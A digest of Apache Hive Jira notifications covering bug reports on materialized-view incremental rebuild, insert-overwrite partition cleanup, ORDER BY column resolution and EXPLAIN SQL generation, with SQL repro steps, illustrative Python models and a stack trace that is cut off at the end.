[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924:
-
Description:

h1. Summary
The incremental rebuild plan and execution output are incorrect when one side of the join has inserted join keys that the other side has deleted, or deleted join keys that the other side has inserted (note the order). The argument is that tuples that have never been present simultaneously should not interact with one another, i.e., one table's inserts should not join the other table's deletes.

h1. Related Test Case
The bug was discovered while reproducing the test case:
??hive/ql/src/test/queries/clientpositive/materialized_view_create_rewrite_5.q??

h1. Steps to Reproduce the Issue
# Configurations:
{code:sql}
SET hive.vectorized.execution.enabled=false;
set hive.support.concurrency=true;
set hive.txn.manager=org.apache.hadoop.hive.ql.lockmgr.DbTxnManager;
set hive.strict.checks.cartesian.product=false;
set hive.materializedview.rewriting=true;
{code}
# Create the first source table:
{code:sql}
create table cmv_basetable_n6 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true');
{code}
# {code:sql}
insert into cmv_basetable_n6 values
  (1, 'alfred', 10.30, 2),
  (1, 'charlie', 20.30, 2);
{code}
# Create the second source table:
{code:sql}
create table cmv_basetable_2_n3 (a int, b varchar(256), c decimal(10,2), d int) stored as orc TBLPROPERTIES ('transactional'='true');
{code}
# {code:sql}
insert into cmv_basetable_2_n3 values
  (1, 'bob', 30.30, 2),
  (1, 'bonnie', 40.30, 2);
{code}
# Create the materialized view:
{code:sql}
CREATE MATERIALIZED VIEW cmv_mat_view_n6 TBLPROPERTIES ('transactional'='true') AS
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;
{code}
# {code:sql}
show tables;
{code}
!截图.PNG!
# Select tuples, including deleted ones and with VirtualColumns, from the MV and the source tables. We see that the MV is correctly built upon creation:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');
{code}
!截图1.PNG!
# {code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true');
{code}
!截图2.PNG!
# {code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true');
{code}
!截图3.PNG!
# Now insert into the LHS and delete from the RHS source table:
{code:sql}
insert into cmv_basetable_n6 values (1, 'kevin', 50.30, 2);
DELETE FROM cmv_basetable_2_n3 WHERE b = 'bonnie';
{code}
# Select again to see what happened:
{code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_n6('acid.fetch.deleted.rows'='true');
{code}
!截图4.PNG!
# {code:sql}
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_basetable_2_n3('acid.fetch.deleted.rows'='true');
{code}
!截图5.PNG!
# Use {{EXPLAIN CBO}} to produce the incremental rebuild plan for the MV, which is already incorrect:
{code:sql}
EXPLAIN CBO
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;
{code}
!截图6.PNG!
# Rebuild the MV and see the (incorrect) results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 REBUILD;
SELECT ROW__IS__DELETED, ROW__ID, * FROM cmv_mat_view_n6('acid.fetch.deleted.rows'='true');
{code}
!截图7.PNG!
# Run the MV definition directly, which outputs incorrect results because the MV is enabled for MV-based query rewrite, i.e., the following query returns whatever is in the MV at the moment:
{code:sql}
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;
{code}
!截图8.PNG!
# Disable MV-based query rewrite for the MV and re-run the definition, which gives the correct results:
{code:sql}
ALTER MATERIALIZED VIEW cmv_mat_view_n6 DISABLE REWRITE;
SELECT cmv_basetable_n6.a, cmv_basetable_2_n3.c
FROM cmv_basetable_n6 JOIN cmv_basetable_2_n3 ON (cmv_basetable_n6.a = cmv_basetable_2_n3.a)
WHERE cmv_basetable_2_n3.c > 10.0;
{code}
!截图9.PNG!

h1. Note
This issue is also seen with inserts/deletes incurred by updates.
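The delta-join argument in the Summary can be made concrete with a toy multiset model. This is only an illustration of the algebra under bag semantics, not Hive's actual rebuild plan: a correct incremental plan joins LHS inserts against the *surviving* RHS rows and cancels deletes against the *old* LHS snapshot, so rows that never coexisted (kevin and bonnie here) never meet; a plan that joins each side's delta against the other side's stale snapshot leaves a spurious `(1, 40.30)` row behind.

```python
from collections import Counter

def mv(lhs, rhs):
    """SELECT l.a, r.c FROM lhs JOIN rhs ON l.a = r.a WHERE r.c > 10.0, bag semantics."""
    return Counter((la, rc) for (la, lb, lc, ld) in lhs
                            for (ra, rb, rc, rd) in rhs
                            if la == ra and rc > 10.0)

lhs_old = [(1, 'alfred', 10.30, 2), (1, 'charlie', 20.30, 2)]
rhs_old = [(1, 'bob', 30.30, 2), (1, 'bonnie', 40.30, 2)]
ins_lhs = [(1, 'kevin', 50.30, 2)]            # inserted after MV creation
del_rhs = [(1, 'bonnie', 40.30, 2)]           # deleted after MV creation

lhs_new = lhs_old + ins_lhs
rhs_new = [r for r in rhs_old if r not in del_rhs]

# Ground truth: full recompute over the current snapshots.
correct = mv(lhs_new, rhs_new)

# Correct incremental algebra: inserts join the post-delete RHS, and the
# deleted RHS rows cancel only their joins with the pre-insert LHS, so the
# never-coexisting pair (kevin, bonnie) is joined in neither direction.
incremental_ok = mv(lhs_old, rhs_old) + mv(ins_lhs, rhs_new) - mv(lhs_old, del_rhs)

# A flawed plan joins each delta against the other side's stale snapshot:
# kevin's insert also joins the already-deleted bonnie, which is never
# cancelled, leaving one spurious (1, 40.30) row in the rebuilt MV.
incremental_bad = mv(lhs_old, rhs_old) + mv(ins_lhs, rhs_old) - mv(lhs_old, del_rhs)
```

Running the model, `incremental_ok` equals `correct` (three `(1, 30.30)` rows), while `incremental_bad` carries the extra insert-joins-delete row, which matches the shape of the wrong output shown in !截图7.PNG!.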
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924:
-
Attachment: 截图9.PNG

> Key: HIVE-27924
> URL: https://issues.apache.org/jira/browse/HIVE-27924
> Project: Hive
> Issue Type: Bug
> Components: Materialized views
> Affects Versions: 4.0.0-beta-1
> Environment: * Docker version : 19.03.6
> * Hive version : 4.0.0-beta-1
> * Driver version : Hive JDBC (4.0.0-beta-1)
> * Beeline version : 4.0.0-beta-1
> Reporter: Wenhao Li
> Priority: Critical
> Labels: bug, hive, materializedviews
> Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924:
-
Attachment: (was: 截图9.PNG)
[jira] [Updated] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
[ https://issues.apache.org/jira/browse/HIVE-27924?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Wenhao Li updated HIVE-27924:
-
Environment:
* Docker version : 19.03.6
* Hive version : 4.0.0-beta-1
* Driver version : Hive JDBC (4.0.0-beta-1)
* Beeline version : 4.0.0-beta-1

was:
h1. Software Env.
* Docker version : 19.03.6
* Hive version : 4.0.0-beta-1
* Driver version : Hive JDBC (4.0.0-beta-1)
* Beeline version : 4.0.0-beta-1
[jira] [Commented] (HIVE-22077) Inserting overwrite partitions clause does not clean directories while partitions' info is not stored in metadata
[ https://issues.apache.org/jira/browse/HIVE-22077?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791918#comment-17791918 ] Kiran Velumuri commented on HIVE-22077:
---
[~Bone An] I see that this issue has been inactive for a long time. In case you are not working on this, can I pick it up? Thanks.

> Key: HIVE-22077
> URL: https://issues.apache.org/jira/browse/HIVE-22077
> Project: Hive
> Issue Type: Bug
> Components: Hive
> Affects Versions: 1.1.1, 2.3.4, 4.0.0
> Reporter: Hui An
> Assignee: Hui An
> Priority: Major
> Attachments: HIVE-22077.patch.1
>
> Inserting overwrite into static partitions may not clean the related HDFS location if the partition's info is not stored in the metastore.
> Steps to reproduce this issue:
> 1. Create a managed table:
> {code:sql}
> CREATE TABLE `test`(
>    `id` string)
> PARTITIONED BY (
>    `dayno` string)
> ROW FORMAT SERDE
>    'org.apache.hadoop.hive.ql.io.orc.OrcSerde'
> STORED AS INPUTFORMAT
>    'org.apache.hadoop.hive.ql.io.orc.OrcInputFormat'
> OUTPUTFORMAT
>    'org.apache.hadoop.hive.ql.io.orc.OrcOutputFormat'
> LOCATION
>    'hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test'
> TBLPROPERTIES (
>    'transient_lastDdlTime'='1564731656')
> {code}
> 2. Create the partition's directory by hand and put some data in it:
> {code}
> hdfs dfs -mkdir hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> hdfs dfs -put test.data hdfs://test-dev-hdfs/user/hive/warehouse/test.db/test/dayno=20190802
> {code}
> 3. Insert overwrite partition dayno=20190802:
> {code:sql}
> INSERT OVERWRITE TABLE test PARTITION(dayno='20190802')
> SELECT "some value";
> {code}
> 4. We can see that test.data under the partition directory is not deleted.
-- This message was sent by Atlassian Jira (v8.20.10#820010)
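The failure mode in the steps above can be sketched as a toy model: cleanup keyed off metastore partition entries misses a directory that exists only on HDFS. This is an illustration of the reported behavior, not Hive's actual code, and every name in it is hypothetical.

```python
def insert_overwrite(fs, known_partitions, partition, new_files, clean_unknown_dirs):
    """Simulate INSERT OVERWRITE into one static partition.

    fs: dict mapping partition directory -> list of file names
    known_partitions: set of partitions registered in the metastore
    clean_unknown_dirs: whether to clear a target directory even when the
    metastore does not know the partition (the expected overwrite semantics).
    """
    if partition in known_partitions or clean_unknown_dirs:
        fs[partition] = []                       # overwrite clears old files
    fs.setdefault(partition, []).extend(new_files)
    known_partitions.add(partition)              # partition is registered now

# Directory created by hand (hdfs dfs -mkdir/-put), never registered:
fs_buggy = {"dayno=20190802": ["test.data"]}
fs_fixed = {"dayno=20190802": ["test.data"]}

insert_overwrite(fs_buggy, set(), "dayno=20190802", ["000000_0"], clean_unknown_dirs=False)
insert_overwrite(fs_fixed, set(), "dayno=20190802", ["000000_0"], clean_unknown_dirs=True)
```

With cleanup gated on metastore knowledge, `fs_buggy` keeps the stale `test.data` next to the new file, matching step 4 of the repro; clearing the directory unconditionally leaves only the newly written file.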
[jira] [Created] (HIVE-27924) Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
Wenhao Li created HIVE-27924:
-
Summary: Incremental rebuild goes wrong when inserts and deletes overlap between the source tables
Key: HIVE-27924
URL: https://issues.apache.org/jira/browse/HIVE-27924
Project: Hive
Issue Type: Bug
Components: Materialized views
Affects Versions: 4.0.0-beta-1
Environment:
h1. Software Env.
* Docker version : 19.03.6
* Hive version : 4.0.0-beta-1
* Driver version : Hive JDBC (4.0.0-beta-1)
* Beeline version : 4.0.0-beta-1
Reporter: Wenhao Li
Attachments: 截图.PNG, 截图1.PNG, 截图2.PNG, 截图3.PNG, 截图4.PNG, 截图5.PNG, 截图6.PNG, 截图7.PNG, 截图8.PNG, 截图9.PNG
[jira] [Commented] (HIVE-21660) Wrong result when union all and later view with explode is used
[ https://issues.apache.org/jira/browse/HIVE-21660?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791864#comment-17791864 ] Chunhui Yang commented on HIVE-21660:
---
I am using Hive 2.3.9 and running with MapReduce rather than Tez, and I still face this problem. Can I edit GenTezUtils.java to fix this bug?

> Key: HIVE-21660
> URL: https://issues.apache.org/jira/browse/HIVE-21660
> Project: Hive
> Issue Type: Bug
> Components: Physical Optimizer
> Affects Versions: 3.1.1
> Reporter: Ganesha Shreedhara
> Assignee: Ganesha Shreedhara
> Priority: Major
> Fix For: 4.0.0-alpha-1
> Attachments: HIVE-21660.1.patch, HIVE-21660.2.patch, HIVE-21660.patch
>
> There is a data loss when the data is inserted into a partitioned table using union all and lateral view with explode.
>
> *Steps to reproduce:*
> {code:sql}
> create table t1 (id int, dt string);
> insert into t1 values (2, '2019-04-01');
> create table t2 (id int, dates array<string>);
> insert into t2 select 1 as id, array('2019-01-01','2019-01-02','2019-01-03') as dates;
> create table dst (id int) partitioned by (dt string);
> set hive.exec.dynamic.partition.mode=nonstrict;
> set hive.exec.dynamic.partition=true;
> insert overwrite table dst partition (dt)
> select t.id, t.dt from (
>   select id, dt from t1
>   union all
>   select id, dts as dt from t2 tt2 lateral view explode(tt2.dates) dd as dts ) t;
> select * from dst;
> {code}
>
> *Actual Result:*
> {code}
> +-----+-------------+
> |  2  | 2019-04-01  |
> +-----+-------------+
> {code}
>
> *Expected Result* (run only the SELECT part of the INSERT query above):
> {code}
> +-----+-------------+
> |  2  | 2019-04-01  |
> |  1  | 2019-01-01  |
> |  1  | 2019-01-02  |
> |  1  | 2019-01-03  |
> +-----+-------------+
> {code}
>
> The data retrieved from the second table using union all and lateral view with explode is missing.
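To make the expected result of the quoted repro concrete, the two branches of the UNION ALL can be rendered in plain Python: `lateral view explode(dates)` emits one output row per array element, joined back to its source row. This is an illustration of the intended semantics only, not Hive internals.

```python
# Rows of the two source tables from the repro above.
t1 = [(2, "2019-04-01")]                                   # (id, dt)
t2 = [(1, ["2019-01-01", "2019-01-02", "2019-01-03"])]     # (id, dates array)

# select id, dt from t1
part1 = [(i, dt) for (i, dt) in t1]

# select id, dts as dt from t2 lateral view explode(tt2.dates) dd as dts:
# one row per array element, paired with the row's id
part2 = [(i, d) for (i, dates) in t2 for d in dates]

# union all: the four rows the INSERT OVERWRITE should write into dst
union_all = part1 + part2
```

The buggy plan loses all of `part2`, which is exactly the gap between the actual and expected result tables in the report.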
[jira] [Updated] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by
[ https://issues.apache.org/jira/browse/HIVE-27923?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Riju Trivedi updated HIVE-27923: Description: Query fails with an 'Invalid column reference' error if the column in the ORDER BY clause is not referenced in the same way as in the GROUP BY clause. Of the three queries below, the first two compile correctly but the third one fails. {code:java} CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure {code} Both column names and aliases should be supported in the ORDER BY clause. was: Query fails with 'Invalid column reference' error if the column in Order by clause is not referenced similar to Group By clause. Like below 2 queries will compile correctly but the third one will fail.
CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure > Query fails with SemanticException if column referenced with name in ORDER by > --- > > Key: HIVE-27923 > URL: https://issues.apache.org/jira/browse/HIVE-27923 > Project: Hive > Issue Type: Bug > Components: Logical Optimizer >Reporter: Riju Trivedi >Priority: Major > > Query fails with an 'Invalid column reference' error if the column in the ORDER BY > clause is not referenced in the same way as in the GROUP BY clause. Of the three > queries below, the first two compile correctly but the third one fails. > {code:java} > CREATE VIEW view_order_by_test AS SELECT > to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` > FROM `order_by_test` > GROUP BY to_date(`order_by_test`.`result_date`) > ORDER BY to_date(`order_by_test`.`result_date`) DESC; > ---Successful > CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS > `process_date`,COUNT(*) AS `count` > FROM `order_by_test` > GROUP BY to_date(`result_date`) > ORDER BY to_date(`result_date`) DESC; > --Successful > CREATE VIEW view_order_by_test AS SELECT > to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` > FROM `order_by_test` > GROUP BY to_date(`order_by_test`.`result_date`) > ORDER BY to_date(`result_date`) DESC; > --Failure > {code} > Both column names and aliases should be supported in the ORDER BY clause.
> -- This message was sent by Atlassian Jira (v8.20.10#820010)
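The failure mode above can be illustrated with a toy sketch. This is NOT Hive's actual resolver; it only shows why comparing expressions by their qualified text makes `to_date(result_date)` fail to match its GROUP BY counterpart, and how normalizing table qualifiers would make both spellings resolve.

```python
# Toy illustration (NOT Hive's actual resolver) of why an ORDER BY
# expression can fail to match its GROUP BY counterpart when one of them
# carries a table qualifier and the other does not.
def strip_qualifier(expr: str, table: str) -> str:
    # Normalize "table.column" references down to bare column names.
    return expr.replace(table + '.', '')

group_by = 'to_date(order_by_test.result_date)'
order_by = 'to_date(result_date)'

# Naive textual comparison fails even though both refer to the same column...
print(group_by == order_by)                                    # False
# ...while comparison after qualifier normalization succeeds.
print(strip_qualifier(group_by, 'order_by_test') == order_by)  # True
```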
[jira] [Created] (HIVE-27923) Query fails with SemanticException if column referenced with name in ORDER by
Riju Trivedi created HIVE-27923: --- Summary: Query fails with SemanticException if column referenced with name in ORDER by Key: HIVE-27923 URL: https://issues.apache.org/jira/browse/HIVE-27923 Project: Hive Issue Type: Bug Components: Logical Optimizer Reporter: Riju Trivedi Query fails with an 'Invalid column reference' error if the column in the ORDER BY clause is not referenced in the same way as in the GROUP BY clause. Of the three queries below, the first two compile correctly but the third one fails. CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`order_by_test`.`result_date`) DESC; ---Successful CREATE VIEW view_order_by_test AS SELECT to_date(`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`result_date`) ORDER BY to_date(`result_date`) DESC; --Successful CREATE VIEW view_order_by_test AS SELECT to_date(`order_by_test`.`result_date`) AS `process_date`,COUNT(*) AS `count` FROM `order_by_test` GROUP BY to_date(`order_by_test`.`result_date`) ORDER BY to_date(`result_date`) DESC; --Failure -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27922) Backport HMS client changes from HIVE-18755
[ https://issues.apache.org/jira/browse/HIVE-27922?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27922: -- Labels: pull-request-available (was: ) > Backport HMS client changes from HIVE-18755 > --- > > Key: HIVE-27922 > URL: https://issues.apache.org/jira/browse/HIVE-27922 > Project: Hive > Issue Type: Improvement >Reporter: Chao Sun >Priority: Major > Labels: pull-request-available > > This is a follow-up on HIVE-27868 to backport HMS client changes related to > the catalog support. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27922) Backport HMS client changes from HIVE-18755
Chao Sun created HIVE-27922: --- Summary: Backport HMS client changes from HIVE-18755 Key: HIVE-27922 URL: https://issues.apache.org/jira/browse/HIVE-27922 Project: Hive Issue Type: Improvement Reporter: Chao Sun This is a follow-up on HIVE-27868 to backport HMS client changes related to the catalog support. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-27868) Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog in HMS 3+
[ https://issues.apache.org/jira/browse/HIVE-27868?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Chao Sun resolved HIVE-27868. - Fix Version/s: 2.3.10 Assignee: Chao Sun Resolution: Fixed > Backport a subset of HIVE-18755 to branch-2.3 to support reading from catalog > in HMS 3+ > --- > > Key: HIVE-27868 > URL: https://issues.apache.org/jira/browse/HIVE-27868 > Project: Hive > Issue Type: Improvement >Reporter: Chao Sun >Assignee: Chao Sun >Priority: Major > Labels: pull-request-available > Fix For: 2.3.10 > > > HIVE-18755 introduced the concept of catalog which adds another level of > namespace on top of tables and databases. Given HMS using Hive 3.x already > has this feature and Hive 2.3 client is commonly used to talk to these > metastores through frameworks such as Spark, this JIRA proposes to backport a > subset of the features to allow Hive 2.3 client to specify catalog to read > from the 3.x metastores. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Component/s: Hive > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task > Components: Hive >Affects Versions: 4.0.0 >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Description: That is an Umbrella Jira to track the activity around Hive 4.0.0 release. *Please note that this is an Open forum and every input from the community is welcomed.* > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Improvement >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Affects Version/s: 4.0.0 > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task >Affects Versions: 4.0.0 >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27921) Prepare for Hive 4.0.0 Release
[ https://issues.apache.org/jira/browse/HIVE-27921?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko updated HIVE-27921: -- Issue Type: Task (was: Improvement) > Prepare for Hive 4.0.0 Release > -- > > Key: HIVE-27921 > URL: https://issues.apache.org/jira/browse/HIVE-27921 > Project: Hive > Issue Type: Task >Reporter: Denys Kuzmenko >Priority: Major > > That is an Umbrella Jira to track the activity around Hive 4.0.0 release. > *Please note that this is an Open forum and every input from the community is > welcomed.* -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Created] (HIVE-27921) Prepare for Hive 4.0.0 Release
Denys Kuzmenko created HIVE-27921: - Summary: Prepare for Hive 4.0.0 Release Key: HIVE-27921 URL: https://issues.apache.org/jira/browse/HIVE-27921 Project: Hive Issue Type: Improvement Reporter: Denys Kuzmenko -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-26630) Introduce copy-on-write DML implementations for Iceberg tables
[ https://issues.apache.org/jira/browse/HIVE-26630?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko resolved HIVE-26630. --- Fix Version/s: 4.0.0 Assignee: Denys Kuzmenko (was: Ayush Saxena) Resolution: Fixed > Introduce copy-on-write DML implementations for Iceberg tables > -- > > Key: HIVE-26630 > URL: https://issues.apache.org/jira/browse/HIVE-26630 > Project: Hive > Issue Type: Improvement >Reporter: Ádám Szita >Assignee: Denys Kuzmenko >Priority: Major > Fix For: 4.0.0 > > > Hive currently only supports the merge-on-read approach when doing > delete/update/merge operations on Iceberg tables. From a performance point of > view this is an advantage on the write side and a disadvantage on the read > side. > We should create a copy-on-write implementation for these where the pros and > cons are inverted, which might suit certain use cases better. -- This message was sent by Atlassian Jira (v8.20.10#820010)
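The write/read trade-off described above can be sketched in a few lines. This is a deliberately simplified conceptual model, not Iceberg's real file formats or metadata: merge-on-read records deletes in a small side file that every scan must merge, while copy-on-write rewrites the affected data file so scans stay plain.

```python
# Conceptual sketch (an assumed simplification, not Iceberg's actual file
# layout) contrasting merge-on-read and copy-on-write deletes of row id 2.
data_file = [(1, 'a'), (2, 'b'), (3, 'c')]

# Merge-on-read: the delete only writes a small "delete file"; readers must
# merge it with the data file on every scan (cheap write, costly read).
delete_file = {2}
mor_scan = [row for row in data_file if row[0] not in delete_file]

# Copy-on-write: the delete rewrites the affected data file without the
# deleted rows; readers scan plain files (costly write, cheap read).
cow_data_file = [row for row in data_file if row[0] != 2]
cow_scan = list(cow_data_file)

# Both strategies must produce the same logical table contents.
print(mor_scan, cow_scan)
```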
[jira] [Created] (HIVE-27920) Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function
Stamatis Zampetakis created HIVE-27920: -- Summary: Failed to generate OPTIMIZED SQL when running EXPLAIN EXTENDED on query with TO_DATE function Key: HIVE-27920 URL: https://issues.apache.org/jira/browse/HIVE-27920 Project: Hive Issue Type: Bug Components: CBO Affects Versions: 4.0.0-beta-1 Reporter: Stamatis Zampetakis Assignee: Stamatis Zampetakis The problem can be reproduced in current master using the following scenario. {code:sql} CREATE TABLE TBL (STRING_DATE STRING); EXPLAIN EXTENDED SELECT TO_DATE(STRING_DATE) FROM TBL; {code} The OPTIMIZED SQL entry is missing from the output of the EXPLAIN. {noformat} STAGE DEPENDENCIES: Stage-0 is a root stage STAGE PLANS: Stage: Stage-0 Fetch Operator limit: -1 Processor Tree: TableScan alias: tbl GatherStats: false Select Operator expressions: to_date(CAST( string_date AS TIMESTAMP)) (type: date) outputColumnNames: _col0 ListSink {noformat} The OPTIMIZED SQL is missing because the conversion from the CBO plan (RelNode) to SQL failed with the following stacktrace.
{noformat} 2023-11-30T07:11:34,486 WARN [ebc7347a-5ea2-49dc-88c8-61b25804e066 main] parse.CalcitePlanner: Rel2SQL Rewrite threw error java.lang.UnsupportedOperationException: class org.apache.calcite.sql.SqlSyntax$6: SPECIAL at org.apache.calcite.util.Util.needToImplement(Util.java:975) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlSyntax$6.unparse(SqlSyntax.java:116) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlOperator.unparse(SqlOperator.java:329) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:108) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlAsOperator.unparse(SqlAsOperator.java:76) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlDialect.unparseCall(SqlDialect.java:453) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.dialect.HiveSqlDialect.unparseCall(HiveSqlDialect.java:112) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.SqlCall.unparse(SqlCall.java:104) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list2(SqlPrettyWriter.java:1291) ~[hive-exec-4.0.0-beta-2-SNAPSHOT.jar:4.0.0-beta-2-SNAPSHOT] at org.apache.calcite.sql.pretty.SqlPrettyWriter$FrameImpl.list(SqlPrettyWriter.java:1271) 